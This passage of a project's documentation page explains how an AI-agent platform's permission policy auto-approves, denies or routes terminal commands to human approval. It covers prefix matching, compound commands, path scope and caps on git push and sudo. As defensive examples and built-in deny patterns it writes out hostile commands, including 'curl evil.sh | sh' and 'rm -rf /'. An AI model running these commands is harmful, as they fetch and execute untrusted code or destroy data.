absolute-caps block — it can be configured as <code>auto_approve</code>, like
<code>open_adr_pr</code>/<code>open_infra_pr</code> — and while it's <code>pending</code>, the Dev Lead's
turn stays SUSPENDED waiting for the decision, not just the conversation
stalled.</p>
<p><code>assess_implementability</code> (ADR 0090, <a href=/brabo/dev/pt-BR/pt-BR/business-rules#rn-340 target=_blank rel="noopener noreferrer" class="">RN-340</a>)
is the implementability assessment of a story (gate <code>implementavel</code>,
<code>docs/gates.yml</code>) — SAME caliber and SAME reasoning as
<code>propose_execution_plan</code>: an initial session decision, not a cap overrun,
and therefore also outside the absolute-caps block. It suspends the Dev
Lead's turn the same way while <code>pending</code>.</p>
<h2 class="anchor anchorTargetStickyNavbar_PEh0" id=how-a-pattern-matches-a-command>How a pattern matches a command<a href=#how-a-pattern-matches-a-command class=hash-link aria-label="Link direto para How a pattern matches a command" title="Link direto para How a pattern matches a command" translate=no>​</a></h2>
<p>Not by substring. The command is tokenized with shell rules and the pattern
matches by <strong>token prefix</strong>:</p>



































<table><thead><tr><th>pattern<th>command<th>matches?<tbody><tr><td><code>Terminal(pnpm test)</code><td><code>pnpm test</code><td>✅<tr><td><code>Terminal(pnpm test)</code><td><code>pnpm test --watch</code><td>✅ (prefix)<tr><td><code>Terminal(pnpm test)</code><td><code>pnpm build</code><td>❌<tr><td><code>Terminal(pnpm test:*)</code><td><code>pnpm test:unit</code><td>✅ (<code>*</code> at the end of the token)<tr><td><code>Terminal(rm)</code><td><code>sudo rm -rf x</code><td>❌ — <code>rm</code> is not the first token</table>
<p>The <code>*</code> applies <strong>inside a token</strong>, at the end. It's not a path glob:
<code>Terminal(rm -rf /*)</code> matches the literal token <code>/*</code>, not "anything under
<code>/</code>".</p>
<p>Environment variables are preserved literally: <code>$HOME</code> stays <code>$HOME</code> in the
match, instead of expanding to empty — expanding would silently change what
is being compared.</p>
<h2 class="anchor anchorTargetStickyNavbar_PEh0" id=compound-command>Compound command<a href=#compound-command class=hash-link aria-label="Link direto para Compound command" title="Link direto para Compound command" translate=no>​</a></h2>
<p>A command with <code>&&</code>, <code>;</code>, <code>|</code>, <code>||</code> or <code>&</code> is split into segments, and
<strong>each segment is evaluated separately</strong>:</p>
<ul>
<li class="">Any segment in <code>deny</code> → the whole command is <code>deny</code>.</li>
<li class=""><strong>All</strong> segments in <code>allow</code> → <code>auto_approve</code>.</li>
<li class="">Any other combination → <code>require_approval</code>.</li>
</ul>
<p><strong>Redirection is not chaining.</strong> <code>></code>, <code>>></code> and <code>&lt;</code> do NOT split a segment:
<code>cat x 2>/dev/null</code> is ONE command whose verb is <code>cat</code>. The redirection
target remains a token of the segment, and that's why <code>echo x > /etc/passwd</code> continues to be blocked by the path-scope cap — what changed
was the VERB becoming correct, not the path becoming free.</p>
<p><code>/dev/null</code>, <code>/dev/stdin</code>, <code>/dev/stdout</code> and <code>/dev/stderr</code> don't count as a
user path: they discard or carry output, they're nobody's file. The list is
exactly this and not all of <code>/dev</code> — <code>/dev/sda</code> is a disk, and remains out
of scope.</p>
<p>This is deliberate and worth understanding: a segment with no rule at all
becomes a <strong>concrete</strong> <code>require_approval</code> opinion, not silence. It's what
prevents <code>pnpm test && curl evil.sh | sh</code> from being auto-approved because
the first half was in <code>allow</code>.</p>
<h2 class="anchor anchorTargetStickyNavbar_PEh0" id=built-in-patterns>Built-in patterns<a href=#built-in-patterns class=hash-link aria-label="Link direto para Built-in patterns" title="Link direto para Built-in patterns" translate=no>​</a></h2>
<p>Three patterns are <code>deny</code> <strong>always</strong>, even without appearing in the file:</p>
<div class="language-text codeBlockContainer_Vzt9 theme-code-block" style=--prism-color:#F8F8F2;--prism-background-color:#282A36><div class=codeBlockContent_FxwE><pre tabindex=0 class="prism-code language-text codeBlock_mqej thin-scrollbar" style=color:#F8F8F2;background-color:#282A36><code class=codeBlockLines_uNqR><div class=token-line style=color:#F8F8F2><span class="token plain">Terminal(rm -rf /)</span><br/></div><div class=token-line style=color:#F8F8F2><span class="token plain">Terminal(rm -rf /*)</span><br/></div><div class=token-line style=color:#F8F8F2><span class="token plain">Terminal(rm -fr /)</span><br/></div></code></pre></div></div>
<p>They are not a comprehensive security list — they're a floor. Real
protection comes from <code>allow</code> being explicit and everything else falling
into approval.</p>
<h2 class="anchor anchorTargetStickyNavbar_PEh0" id=what-activating-execution-seeds>What activating execution seeds<a href=#what-activating-execution-seeds class=hash-link aria-label="Link direto para What activating execution seeds" title="Link direto para What activating execution seeds" translate=no>​</a></h2>
<p>Activating execution writes the <code>DEV_TERMINAL_ALLOW_PATTERNS</code> patterns
(<code>apps/api/src/domain/actions/dev-terminal-patterns.ts</code>) into the project's
<code>allow</code>. There are two families:</p>
<ul>
<li class=""><strong>reading the worktree itself</strong> — <code>ls</code>, <code>pwd</code>, <code>find</code>, <code>cat</code>, <code>head</code>,
<code>tail</code>, <code>grep</code>, <code>wc</code>, <code>echo</code>, <code>git status</code>, <code>git diff</code>, <code>git log</code>;</li>
<li class=""><strong>reading git history/remote/config</strong> — <code>git branch -a/-r/-v/--list/--show-current</code>, <code>git remote -v</code>, <code>git remote show</code>, <code>git worktree list</code>, <code>git show</code>, <code>git for-each-ref</code>, <code>git ls-tree</code>, <code>git rev-parse</code>, <code>git config --get</code> (see <a href=/brabo/dev/pt-BR/pt-BR/business-rules/custo#rn-143 target=_blank rel="noopener noreferrer" class="">RN-143</a>);</li>
<li class=""><strong>build and test</strong> — <code>pnpm install</code>, <code>pnpm test</code>, <code>npm run</code>, <code>npx vitest</code>, <code>mix test</code>, <code>pytest</code>, <code>go test</code>, <code>cargo test</code>, among others.</li>
</ul>
<p>The third family exists because <code>ReportDone</code> only allows opening a PR after
a <code>terminal</code> with <code>exit 0</code> in the history. The first exists because the
agent <strong>looks before it builds</strong>: without it, every <code>ls -la</code> in a newly
provisioned repository fell into approval, came back as <code>status pending</code> —
and not as the command's output — and burned a ToolLoop iteration until the
task died by limit (see <a href=/brabo/dev/pt-BR/pt-BR/business-rules/custo#rn-068 target=_blank rel="noopener noreferrer" class="">RN-068</a>). The second
exists because <code>git status</code>/<code>diff</code>/<code>log</code> are enough to look at the
worktree, but not for the agent to orient itself in the history and remotes
of a newly adopted repository — a real session spent dozens of manual
approvals on subcommands like <code>git branch -a</code> or <code>git worktree list</code> that
fell outside <code>allow</code> and pushed to manual approval any compound command
they appeared in.</p>
<p>This does NOT loosen anything described above. It still holds that <code>deny</code>
beats <code>allow</code>, that the built-in patterns remain active, that matching is
by <strong>token</strong> prefix (<code>ls</code> allowed doesn't allow <code>lsof</code>), and that a
compound command requires EVERY segment to match — so <code>ls && rm -rf /</code>
doesn't pass because of the <code>ls</code>.</p>
<p>The second family requires extra care, because prefix matching allows
ANYTHING after the prefix that matched: a bare pattern <code>Terminal(git branch)</code> would match both <code>git branch -D nome</code> (deletes) and <code>git branch nome-nova</code> (creates) as well as the plain listing, because it can't see
what comes after. That's why <code>branch</code>, <code>remote</code>, <code>worktree</code> and <code>config</code> —
the four that have a MUTATING sibling — only got in ANCHORED by the flag
that makes the read unambiguous (<code>-a</code>/<code>-v</code>/<code>show</code>/<code>list</code>/<code>--get</code>), never by
the bare verb; <code>git branch -D/-d/-m/-M</code>, <code>git remote add/remove/set-url</code>,
<code>git worktree add/remove/prune</code> and <code>git config &lt;chave> &lt;valor></code> (without
<code>--get</code>) still require approval. <code>show</code>, <code>log</code>, <code>for-each-ref</code>, <code>ls-tree</code>
and <code>rev-parse</code> didn't need an anchor: none of their continuations mutate
the repository.</p>
<p>Auto-approving <code>terminal</code> via <code>agent_autonomy</code> would be different and is
not what's done: it would free up ANY command inside the engine container,
with no file in the middle.</p>
<h2 class="anchor anchorTargetStickyNavbar_PEh0" id=the-complete-decision-order>The complete decision order<a href=#the-complete-decision-order class=hash-link aria-label="Link direto para The complete decision order" title="Link direto para The complete decision order" translate=no>​</a></h2>
<!-- -->
<p><strong>Node <code>Z</code> changed position</strong> (<a href=/brabo/dev/pt-BR/pt-BR/business-rules#rn-418 target=_blank rel="noopener noreferrer" class="">RN-418</a>,
revises <a href=/brabo/dev/pt-BR/pt-BR/business-rules/autenticacao#rn-106 target=_blank rel="noopener noreferrer" class="">RN-106</a>): until the introduction of
the local runner, it sat right after IAM and returned <code>deny</code> — now it's a
CAP, in the same final block as the other three, applied after
<code>agent_autonomy</code> and <code>permissions.json</code> have already given their opinion.
See the section
<a href=#a-fronteira-de-efeito-externo-e-comando-privilegiado-rn-418 class="">"The boundary of external effect and privileged command"</a>
below for why.</p>
<h3 class="anchor anchorTargetStickyNavbar_PEh0" id=auto-mode-the-agent_autonomy-wildcard-rn-153>"Auto mode": the <code>agent_autonomy</code> wildcard (<a href=/brabo/dev/pt-BR/pt-BR/business-rules/autenticacao#rn-153 target=_blank rel="noopener noreferrer" class="">RN-153</a>)<a href=#auto-mode-the-agent_autonomy-wildcard-rn-153 class=hash-link aria-label="Link direto para auto-mode-the-agent_autonomy-wildcard-rn-153" title="Link direto para auto-mode-the-agent_autonomy-wildcard-rn-153" translate=no>​</a></h3>
<p>The <code>agent_autonomy has an opinion?</code> node in the diagram above doesn't
know, and doesn't need to know, whether the opinion came from a SPECIFIC
rule (<code>actionType: "terminal"</code>) or from the <code>actionType: "*"</code> wildcard —
"auto mode": autonomy for ANY type of action by that agent, turned on with
a click on "Automatic mode" in the <code>ApprovalCard</code>. The resolution happens
BEFORE this diagram begins, in a single repository:
<code>DrizzleAgentAutonomyRepository.findMode</code> looks up the specific rule and
the wildcard in the same query, and returns the specific one when both
exist — writing <code>terminal: deny</code> with <code>"*": auto_approve</code> turned on still
denies <code>terminal</code> for that agent, while freeing up the rest.</p>
<p>That's why the diagram didn't get a new node, and it's proof that the
caps, right below, apply to "auto mode" with no exception declared
anywhere: they react to <code>current.policy === 'auto_approve'</code>, never to its
origin (<a href=/brabo/dev/pt-BR/pt-BR/business-rules/autenticacao#rn-154 target=_blank rel="noopener noreferrer" class="">RN-154</a>).</p>
<p>"Auto mode" requires <code>maintainer</code> — the same role that already protected
<code>PUT .../agent-autonomy</code> before the wildcard existed. Turning it off
reuses the manual/auto toggle the agent card already had in
Overview/Executors: with the wildcard written, the toggle switches to
editing IT instead of the usual representative type, and "manual" on it is
the same wildcard rewritten as <code>require_approval</code>.</p>
<h2 class="anchor anchorTargetStickyNavbar_PEh0" id=a-fronteira-de-efeito-externo-e-comando-privilegiado-rn-418>The boundary of external effect and privileged command (RN-418)<a href=#a-fronteira-de-efeito-externo-e-comando-privilegiado-rn-418 class=hash-link aria-label="Link direto para The boundary of external effect and privileged command (RN-418)" title="Link direto para The boundary of external effect and privileged command (RN-418)" translate=no>​</a></h2>
<p><strong>Revision of <a href=/brabo/dev/pt-BR/pt-BR/adr/0065-container-por-projeto-a-fronteira-deixa-de-ser-politica target=_blank rel="noopener noreferrer" class="">ADR 0065</a>
by <a href=/brabo/dev/pt-BR/pt-BR/adr/0102-revisao-do-adr-0065-teto-absoluto-substitui-deny target=_blank rel="noopener noreferrer" class="">ADR 0102</a></strong>
— a GLOBAL and explicit decision by the product owner, confirmed after an
automatic security warning about the change (the full history is in the
ADR). What follows describes the CURRENT behavior; the previous version
(unconditional <code>deny</code>, applied before any permissive stage) was replaced,
not loosened — see why right below.</p>
<p><code>git push</code>, <code>git remote add</code>/<code>set-url</code>, <code>git merge</code>, the provider CLIs
(<code>gh pr create</code>, <code>gh pr merge</code>, <code>glab mr create</code>/<code>merge</code>, releases and
workflow dispatch), common deploy commands (<code>kubectl apply</code>, <code>helm upgrade</code>, <code>terraform apply</code>, <code>docker push</code>, <code>npm publish</code>, ...) and now
also <code>sudo</code>/<code>doas</code> in a <code>terminal</code> command are an <strong>ABSOLUTE CAP</strong> — in the
same final block as the other three caps (see <a href=#caps class="">"Caps"</a> below),
applied after <code>agent_autonomy</code> and <code>permissions.json</code> have already given
their opinion: if the verdict up to that point was <code>auto_approve</code>, it
becomes unconditional <code>require_approval</code>. Neither the <code>"*"</code> wildcard for
"automatic mode" nor an <code>allow</code> entry in <code>permissions.json</code> can promote it
back.</p>
<p><strong>Why <code>require_approval</code> is now safe, when before it required <code>deny</code>.</strong>
The historical reason for the <code>deny</code> was concrete: "always allow" writes
the pattern into <code>allow</code>, and a single click would be enough to reopen the
door forever. That gap was closed AT THE SOURCE, not worked around:
<code>ApproveAlwaysActionUseCase</code>/<code>patternForAction</code>
(<code>apps/api/src/application/use-cases/actions/approve-always-action.use-case.ts</code>)
REFUSE to write a pattern into <code>allow</code> for a terminal action with git
external effect or a privileged command — the user still approves the
specific instance through the normal flow, but "always allow" never writes
the pattern for these two cases. Without this refusal, the cap would be
decorative.</p>
<p><code>sudo</code>/<code>doas</code> got their own category in <code>external-effect.ts</code>
(<code>comandoPrivilegiadoNoComando</code>), matching by VERB in any segment — same
principle as <code>efeitoExternoNoComando</code> for git, which continues matching by
<strong>token prefix</strong>, ignoring global flags in the middle (<code>git -C /tmp push</code>
matches <code>git push</code>). Each segment of a compound command is checked: <code>pnpm test && git push origin main</code> is blocked by the second segment, the same
way a compound command already requires every segment to match to become
<code>auto_approve</code>.</p>
<p>The cap doesn't take power away from the agent: for git, the error message
keeps pointing to which <strong>typed</strong> action to use — <code>git_push</code>, <code>git_merge</code>
or <code>pr_open</code> — which is born a <code>proposed_action</code>, follows the normal
pipeline, and records in the event log what was pushed and to where (it's
the path the dev agent already uses today, <code>agent_io.ex</code>). <code>sudo</code>/<code>doas</code>
don't have an equivalent typed action — the message just explains why that
command requires a human decision.</p>
<p><strong>Where this matters most now</strong>: the
<a href=/brabo/dev/pt-BR/pt-BR/adr/0103-runner-local-execucao-na-maquina-do-usuario target=_blank rel="noopener noreferrer" class="">local runner</a>
executes ALREADY approved commands on the user's own machine, with their
own privileges — it's exactly the scenario where a legitimate <code>sudo</code> (or
an attempt to escape via <code>sudo</code>) needs a human stop guaranteed by
construction, not by <code>permissions.json</code> convention.</p>
<h2 class="anchor anchorTargetStickyNavbar_PEh0" id=path-scope>Path scope<a href=#path-scope class=hash-link aria-label="Link direto para Path scope" title="Link direto para Path scope" translate=no>​</a></h2>
<p>A <code>terminal</code> command is also evaluated by <strong>where it touches</strong>, not just
by the verb (<a href=/brabo/dev/pt-BR/pt-BR/adr/0055-escopo-de-caminho-na-politica-de-terminal target=_blank rel="noopener noreferrer" class="">ADR 0055</a>,
<a href=/brabo/dev/pt-BR/pt-BR/business-rules/custo#rn-075 target=_blank rel="noopener noreferrer" class="">RN-075</a>). The project folder —
<code>&lt;PROJECT_WORKSPACES_ROOT>/&lt;workspace_dir_name></code>, where <code>permissions.json</code>
and all agent worktrees live — is the <strong>scope</strong>. <code>workspace_dir_name</code>
(<a href=/brabo/dev/pt-BR/pt-BR/adr/0066-nome-de-pasta-legivel-do-workspace target=_blank rel="noopener noreferrer" class="">ADR 0066</a>,
<a href=/brabo/dev/pt-BR/pt-BR/business-rules/autenticacao#rn-109 target=_blank rel="noopener noreferrer" class="">RN-109</a>) is the folder name frozen at
project creation — readable (<code>&lt;slug>-&lt;8 chars of the id></code>) in a new
project, the plain UUID in a project from before that change.</p>
<p><strong>A project in <code>local</code> mode has a different scope, and the difference
matters here</strong> (<a href=/brabo/dev/pt-BR/pt-BR/adr/0072-projeto-local-ou-container target=_blank rel="noopener noreferrer" class="">ADR 0072</a>,
<a href=/brabo/dev/pt-BR/pt-BR/business-rules/autenticacao#rn-169 target=_blank rel="noopener noreferrer" class="">RN-169</a>/<a href=/brabo/dev/pt-BR/pt-BR/business-rules/autenticacao#rn-170 target=_blank rel="noopener noreferrer" class="">RN-170</a>):
the root becomes the <strong>absolute path the user typed at creation</strong>, not
<code>join(PROJECT_WORKSPACES_ROOT, workspace_dir_name)</code>.</p>
<p>Everything this section describes still holds — the scope tightens and
loosens exactly the same way, and <code>deny</code> still wins first. What changes is
what it CONTAINS. And the consequence is declared without softening in ADR
0072: the <strong>structural</strong> containment of the <code>join</code> — "the result never
leaves the managed root, whatever happens to the column" — ceases to exist
for these projects. What replaces it is the creation-time validation
(RN-170: absolute, no <code>..</code>, existing, writable, never a system root, never
overlapping the Brabo checkout), plus the LEXICAL revalidation of the same
predicate on every derivation of the root — so that a row tampered with
directly in the database doesn't turn into a terminal scope at <code>/</code>.</p>
<p>Path comparison is <strong>lexical and without regex over the input</strong>: trimming
trailing slashes is an O(n) scan, not <code>.replace(/\/+$/, '')</code>. The old
pattern was flagged by CodeQL as polynomial ReDoS (HIGH) — it forces the
engine to try every starting position, and degrades to O(n²) with many
slashes. The input here comes from an agent command, so it's not a place
for backtracking regex.</p>
<p>The scope does two opposite things, and it's the combination that matters:</p>
<p><strong>Tightens.</strong> A command that touches a path from outside is never
auto-approved, no matter how much the verb is in <code>allow</code>. Without this, an
allowed <code>Terminal(cat)</code> would auto-execute <code>cat /workspace/apps/engine/lib/engine/actions/git_executor.ex</code> — the platform
code that runs the agent — and reach into other projects' worktrees.</p>
<p><strong>Loosens.</strong> Within the scope, <code>cd</code> stops being a verb that needs
permission: it's the scope declaration itself. Without this, the dev
agent, which always emits <code>cd &lt;caminho> && &lt;verbo></code>, would run into the
compound-command rule — every segment needs to match — and <strong>every</strong>
command would stop for approval, no matter how much the verb was allowed.</p>
<p>Three limits worth understanding:</p>
<ul>
<li class=""><strong>Scope permits, it doesn't exempt.</strong> Being in the project folder
doesn't make <code>curl … | sh</code> safe: a verb outside <code>allow</code> still requires
approval.</li>
<li class=""><strong>Outside the scope is <code>require_approval</code>, not <code>deny</code>.</strong> The agent may
have a legitimate reason to look outside; who decides remains you.</li>
<li class=""><strong>Normalization is lexical, not <code>realpath</code>.</strong> <code>&lt;raiz>/../..</code> is resolved
and rejected; a symbolic link inside the project pointing outward is
<strong>not</strong> detected. Scope is policy, not isolation.</li>
</ul>
<p>Which tokens are checked: <strong>absolute</strong> ones (start with <code>/</code>) and ones that
contain <code>..</code>. A relative one without <code>..</code> resolves under the <code>cwd</code>, which
was already checked — and treating <code>-maxdepth</code>, <code>4</code>, or <code>*.ex</code> as a path
would reject a legitimate command without gaining any security.</p>
<p>Two properties that fall out of this:</p>
<p><strong><code>deny</code> wins immediately.</strong> No matter what stage it appears in, it
returns right away. There's no configuration that reverts a <code>deny</code>.</p>
<p><strong>A silent stage never downgrades.</strong> If <code>agent_autonomy</code> said
<code>auto_approve</code> and <code>permissions.json</code> has no rule for that action, the
result stays <code>auto_approve</code> — the file doesn't "vote against" by
omission. Each stage can only raise the permissiveness of the previous
one.</p>
<h2 class="anchor anchorTargetStickyNavbar_PEh0" id=caps>Caps<a href=#caps class=hash-link aria-label="Link direto para Caps" title="Link direto para Caps" translate=no>​</a></h2>
<p>Applied <strong>last</strong>, after everything else:</p>






























<table><thead><tr><th>cap<th>effect<th>why<tbody><tr><td><code>git_merge</code> with destination in <code>dev</code>, <code>qa</code>, <code>rc</code> or <code>main</code><td><code>auto_approve</code> → <code>require_approval</code><td>merge into a protected branch is always your decision (<a href=/brabo/dev/pt-BR/pt-BR/business-rules#rn-006 target=_blank rel="noopener noreferrer" class="">RN-006</a>)<tr><td><code>instruction_patch</code><td><code>auto_approve</code> → <code>require_approval</code><td>you need to see the diff before one agent changes another's behavior (<a href=/brabo/dev/pt-BR/pt-BR/business-rules#rn-007 target=_blank rel="noopener noreferrer" class="">RN-007</a>)<tr><td><code>parallelize</code> and <code>raise_max_parallel</code><td><code>auto_approve</code> → <code>require_approval</code><td>spending on more agents is your decision; without this cap the lead's limit would be decorative, and raising the cap itself would be the product raising its own spending limit (<a href=/brabo/dev/pt-BR/pt-BR/business-rules/custo#rn-086 target=_blank rel="noopener noreferrer" class="">RN-086</a>)<tr><td><code>terminal</code> with external-effect git (push/PR/deploy) or <code>sudo</code>/<code>doas</code><td><code>auto_approve</code> → <code>require_approval</code><td>external-effect git and privileged commands are never auto-approvable, even with "automatic mode" on (<a href=/brabo/dev/pt-BR/pt-BR/business-rules#rn-418 target=_blank rel="noopener noreferrer" class="">RN-418</a>, revises <a href=/brabo/dev/pt-BR/pt-BR/business-rules/autenticacao#rn-106 target=_blank rel="noopener noreferrer" class="">RN-106</a>) — see the dedicated section above</table>
<p>A cap downgrades <code>auto_approve</code> to <code>require_approval</code>; it does <strong>not</strong>
turn <code>deny</code> into something else, because <code>deny</code> would have already
returned earlier.</p>
<p>:::note Why <code>rc</code> is still on the list</p>
<p>The <code>rc</code> rung left the branch policy
(<a href=/brabo/dev/pt-BR/pt-BR/adr/0030-politica-de-branches-mecanizada target=_blank rel="noopener noreferrer" class="">ADR 0030</a>) and the
bootstrap stopped creating it (<a href=/brabo/dev/pt-BR/pt-BR/business-rules#rn-029 target=_blank rel="noopener noreferrer" class="">RN-029</a>) —
but it's still here, in <code>domain/actions/protected-branches.ts</code>.</p>
<p>This list decides what the merge lock <strong>refuses</strong>, and repositories
bootstrapped by earlier versions of Brabo still have the branch. Removing
it from here wouldn't remove anything from anyone's repository: it would
only make a <code>git_merge</code> with destination <code>rc</code> auto-approvable, on a branch
someone might be using as production.</p>
<p>Protecting a branch that doesn't exist costs nothing. Unprotecting one
that exists costs dearly — and the asymmetry is deliberate.</p>
<p>:::</p>
<p>The difference between a cap and a default: the default is what happens
when nobody configured anything; the cap is what happens <strong>regardless</strong> of
what was configured.</p>
<h2 class="anchor anchorTargetStickyNavbar_PEh0" id=what-happens-to-the-agent-while-the-decision-doesnt-come>What happens to the agent while the decision doesn't come<a href=#what-happens-to-the-agent-while-the-decision-doesnt-come class=hash-link aria-label="Link direto para What happens to the agent while the decision doesn't come" title="Link direto para What happens to the agent while the decision doesn't come" translate=no>​</a></h2>
<p>A <code>pending</code> action isn't just a row waiting for a click: on the other side
there's an agent stopped.</p>
<p>When the tool it called becomes pending, its loop <strong>suspends</strong>, holding on
to the task, the worktree, and the conversation history, and it enters
<code>awaiting_approval</code>. Your decision emits <code>task.action_settled</code>, which
wakes it up: the real result of the command takes the place where the
response would be, and the loop resumes from where it stopped.</p>
<p><strong>Refusing also responds.</strong> The reason takes the place of the result, and
the agent learns that path is closed instead of waiting forever — denying
doesn't leave it stuck.</p>
<p>This matters for whoever operates: approving late doesn't waste the work
already done, and the approval queue isn't asynchronous for convenience —
it's literally what the agent is waiting for. Before this, <code>pending</code> came
back as if it were the command's response, and the agent burned its
iteration cap trying something else until the task died without a single
line written (<a href=/brabo/dev/pt-BR/pt-BR/business-rules/custo#rn-073 target=_blank rel="noopener noreferrer" class="">RN-073</a>).</p>
<p><strong>With one exception: engine restart.</strong> The suspended loop lives in
memory, so a restart takes it down with it. In that case the task does
<strong>not</strong> stay waiting: it goes back to the blocked queue, with the reason
and origin <code>infra</code> in the event log, and a decision made after that has
nowhere left to be applied — the decided action stays recorded, but the
turn that was waiting for it no longer exists. If you approved and nothing
happened, this is the first place to look.</p>
<p>Auto-approval doesn't go through here: it executes at the proposal and the
result comes back in the same turn — which is exactly the value of having
the patterns from the previous section.</p>
<p><strong>The Dev Lead suspends the same way, with one difference on restart</strong>
(ADR 0086, <a href=/brabo/dev/pt-BR/pt-BR/business-rules#rn-284 target=_blank rel="noopener noreferrer" class="">RN-284</a>). It's conversational, it
has no worktree or task — what suspends is the turn's synchronous
<code>handle_call</code>, via <code>agent.status: awaiting_approval</code>. Unlike the dev
agent, it does NOT have a queue to return to on an engine restart: the
decision remains recorded and visible in Approvals, but the Dev Lead
doesn't narrate the outcome on its own — the process that was waiting
died, and the next restart brings up a new Dev Lead, with no subscription
for that action. An accepted and declared gap, not a disguised one.</p>
<h2 class="anchor anchorTargetStickyNavbar_PEh0" id=what-gets-written-for-each-decision>What gets written for each decision<a href=#what-gets-written-for-each-decision class=hash-link aria-label="Link direto para What gets written for each decision" title="Link direto para What gets written for each decision" translate=no>​</a></h2>
<p>Every proposed action and every decision about it become a <strong>domain
event</strong> in <code>session_events</code>, with the real actor
(<a href=/brabo/dev/pt-BR/pt-BR/business-rules/custo#rn-049 target=_blank rel="noopener noreferrer" class="">RN-049</a>):</p>






























<table><thead><tr><th>event<th>actor<th>when<tbody><tr><td><code>proposed_action.created</code><td>the <strong>agent</strong> that proposed it<td>always, before any execution. <code>payload.status</code> says how the action was born: <code>pending</code>, <code>auto_approved</code>, or <code>denied</code><tr><td><code>proposed_action.approved</code><td>the <strong>user</strong> who clicked<td>only on manual approval (including <code>approve_always</code>)<tr><td><code>proposed_action.denied</code><td>the <strong>user</strong> who refused<td>with <code>payload.reason</code><tr><td><code>action.executed</code> / <code>action.failed</code><td><code>system</code><td>execution outcome</table>
<p>From this comes the only reliable way to separate the two things this
document describes:</p>
<ul>
<li class=""><strong>human decision</strong> = count <code>proposed_action.approved</code> events;</li>
<li class=""><strong>policy decision</strong> = <code>proposed_action.created</code> with <code>status: auto_approved</code> and an agent actor. It never produces a <code>.approved</code>, and
so it's never confused with a click.</li>
</ul>
<p>This wasn't true until Phase 12e. The first three rows went <strong>only to the
outbox</strong>, which is transport — drained, marked with <code>processed_at</code>, and
pruned — and the decision survived only in <code>proposed_actions.decided_at</code>,
a column outside the timeline that the UI, the Psychologist, and the
Anamnesis read. The practical result was that "how many times did the
human approve" couldn't be answered in the Phase 10 dogfooding, which was
exactly that experiment's main metric.</p>
<p>Repository bootstrap is the deliberate exception: the mutations it
proposes don't emit <code>proposed_action.created</code> in the log, because they're
already narrated by <code>bootstrap.step_*</code> in the same session — counting them
again would inflate the approval metric with work nobody approved.</div></div></div><div class=row><div class="col col--12"><footer class="theme-doc-footer docusaurus-mt-lg"><div class="row margin-top--sm theme-doc-footer-edit-meta-row"><div class="col noPrint_yZb9"><a href=https://github.com/daneiel/brabo/blob/dev/docs/reference/permissions.md target=_blank rel="noopener noreferrer" class=theme-edit-this-page><svg fill=currentColor height=20 width=20 viewBox="0 0 40 40" class=iconEdit_ANja aria-hidden=true><g><path d="m34.5 11.7l-3 3.1-6.3-6.3 3.1-3q0.5-0.5 1.2-0.5t1.1 0.5l3.9 3.9q0.5 0.4 0.5 1.1t-0.5 1.2z m-29.5 17.1l18.4-18.5 6.3 6.3-18.4 18.4h-6.3v-6.2z"/></g></svg>Editar esta página</a></div><div class="col lastUpdated_Kb4y"><span class=theme-last-updated>Última atualização<!-- --> em <b><time datetime=2026-08-29T23:14:14.000Z itemprop=dateModified>29 de ago. de 2026</time></b> por <b>Daniel Souza</b></span></div></div></footer></div></div></article><div class=row><div class="col col--12"><nav class="docusaurus-mt-lg pagination-nav" aria-label="Páginas de documento"><a class="pagination-nav__link pagination-nav__link--prev" href=/brabo/dev/pt-BR/reference/events><div class=pagination-nav__sublabel>Anterior</div><div class=pagination-nav__label>Events</div></a><a class="pagination-nav__link pagination-nav__link--next" href=/brabo/dev/pt-BR/reference/artifacts><div class=pagination-nav__sublabel>Próxima</div><div class=pagination-nav__label>Artifacts</div></a></nav></div></div></div></div><div class="col col--3"><div class="tableOfContents_wOiH thin-scrollbar theme-doc-toc-desktop"><ul class="table-of-contents table-of-contents__left-border"><li><a href=#the-file class="table-of-contents__link toc-highlight">The file</a><ul><li><a href=#with-which-credential-the-auto-approved-action-executes class="table-of-contents__link toc-highlight">With which credential the auto-approved action executes</a></ul><li><a href=#the-pattern-format class="table-of-contents__link toc-highlight">The pattern format</a><li><a href=#how-a-pattern-matches-a-command class="table-of-contents__link toc-highlight">How a pattern matches a command</a><li><a href=#compound-command class="table-of-contents__link toc-highlight">Compound command</a><li><a href=#built-in-patterns class="table-of-contents__link toc-highlight">Built-in patterns</a><li><a href=#what-activating-execution-seeds class="table-of-contents__link toc-highlight">What activating execution seeds</a><li><a href=#the-complete-decision-order class="table-of-contents__link toc-highlight">The complete decision order</a><ul><li><a href=#auto-mode-the-agent_autonomy-wildcard-rn-153 class="table-of-contents__link toc-highlight">"Auto mode": the <code>agent_autonomy</code> wildcard (RN-153)</a></ul><li><a href=#a-fronteira-de-efeito-externo-e-comando-privilegiado-rn-418 class="table-of-contents__link toc-highlight">The boundary of external effect and privileged command (RN-418)</a><li><a href=#path-scope class="table-of-contents__link toc-highlight">Path scope</a><li><a href=#caps class="table-of-contents__link toc-highlight">Caps</a><li><a href=#what-happens-to-the-agent-while-the-decision-doesnt-come class="table-of-contents__link toc-highlight">What happens to the agent while the decision doesn't come</a><li><a href=#what-gets-written-for-each-decision class="table-of-contents__link toc-highlight">What gets written for each decision</a></ul></div></div></div></div></main></div></div></div><footer class="theme-layout-footer footer footer--dark"><div class="container container-fluid"><div class="row footer__links"><div class="theme-layout-footer-column col footer__col"><div class=footer__title>Documentação</div><ul class="footer__items clean-list"><li class=footer__item><a class=footer__link-item href=/brabo/dev/pt-BR/getting-started>Primeiros passos</a><li class=footer__item><a class=footer__link-item href=/brabo/dev/pt-BR/architecture>Arquitetura</a><li class=footer__item><a class=footer__link-item href=/brabo/dev/pt-BR/business-rules>Regras de negócio</a><li class=footer__item><a class=footer__link-item href=/brabo/dev/pt-BR/runbook>Runbook</a></ul></div><div class="theme-layout-footer-column col footer__col"><div class=footer__title>Comunidade</div><ul class="footer__items clean-list"><li class=footer__item><a href=https://github.com/daneiel/brabo/blob/dev/CONTRIBUTING.md target=_blank rel="noopener noreferrer" class=footer__link-item>Como contribuir<svg width=13.5 height=13.5 aria-label="(opens in new tab)" class=iconExternalLink_jHTF><use href=#theme-svg-external-link /></svg></a><li class=footer__item><a href=https://github.com/daneiel/brabo/blob/dev/SUPPORT.md target=_blank rel="noopener noreferrer" class=footer__link-item>Onde pedir ajuda<svg width=13.5 height=13.5 aria-label="(opens in new tab)" class=iconExternalLink_jHTF><use href=#theme-svg-external-link /></svg></a><li class=footer__item><a href=https://github.com/daneiel/brabo/blob/dev/SECURITY.md target=_blank rel="noopener noreferrer" class=footer__link-item>Segurança<svg width=13.5 height=13.5 aria-label="(opens in new tab)" class=iconExternalLink_jHTF><use 